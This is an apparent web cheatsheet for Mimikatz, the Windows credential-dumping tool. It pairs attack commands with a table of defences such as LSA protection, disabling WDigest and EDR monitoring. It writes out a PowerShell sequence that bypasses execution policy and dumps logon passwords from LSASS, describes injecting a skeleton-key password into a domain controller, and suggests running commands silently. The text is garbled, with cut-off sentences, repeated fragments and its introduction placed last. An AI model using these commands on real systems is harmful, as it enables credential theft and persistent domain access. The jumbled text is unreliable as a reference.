Mimikatz Cheatsheet

Mimikatz is a . Script kiddies use it to cause damage. Professionals use it to find gaps before adversaries do.

misc::skeleton — Injects a master password into the LSASS process on a Domain Controller, allowing any user to authenticate with a "skeleton" password. Advanced Workarounds

# Using Invoke-Mimikatz (from PowerSploit) powershell -exec bypass Import-Module .\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"' mimikatz cheatsheet

Save commands to a .txt file and execute silently.

| Defense | Why it Works | | :--- | :--- | | (Windows 10/11 + Server 2016+) | Runs LSASS as a virtualized protected process. Mimikatz cannot read its memory. | | Enable "Run as Protected Process" (LSA Protection) | Prevents privilege::debug from accessing LSASS. | | Disable WDigest (Registry key: UseLogonCredential =0) | Prevents storage of plaintext passwords in memory. | | Deploy EDR with LSASS Monitoring | EDR hooks OpenProcess and ReadProcessMemory calls on LSASS. | | Restrict Admin Logons (Tiering) | Prevent domain admin sessions on low-value workstations. | Mimikatz is a

Mimikatz is widely used for "Pass-the-Ticket" and ticket forging attacks.

Understanding how tools like Mimikatz interact with a system is the first step in defending against unauthorized access. Here are common defensive measures: misc::skeleton — Injects a master password into the

privilege::debug — Grants the necessary rights to interact with the LSASS process.

is arguably the most powerful and infamous post-exploitation tool ever created. Developed by Benjamin Delpy (@gentilkiwi), it allows security professionals to extract plaintext passwords, hashes, PINs, and Kerberos tickets directly from Windows memory.

If you are defending a network, you must assume Mimikatz will be used.